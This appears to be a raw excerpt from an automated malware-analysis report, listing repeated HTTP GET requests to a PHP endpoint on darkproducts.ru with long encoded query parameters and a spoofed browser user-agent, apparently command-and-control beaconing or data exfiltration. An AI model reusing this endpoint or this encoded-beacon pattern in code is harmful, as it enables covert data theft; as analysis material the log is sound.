Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=d1nIiojIzEzN2kTOlRGNzIWYlVGZmBjYilTZlRDO5IGZ5gTY4UjIsIyN3MWMklTOxUjM3IGM4cjN3YzM4EzYzYWOzMDMjVzMzYWMkNGOzQDNiojI4gDM4cTN1UGNldDOmRGNyQWO1QWNxMWO1ATZiRGOiBjIsISN4EmMmNGNzMTO3kzY1cDMxMTOiRjMhVGN2UTZwQmYkJjMiNmMxYWZiojI5ETOhF2YmdjM5YjZmljZ4ATNiJzNwcTOkRDNlZjM0AjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
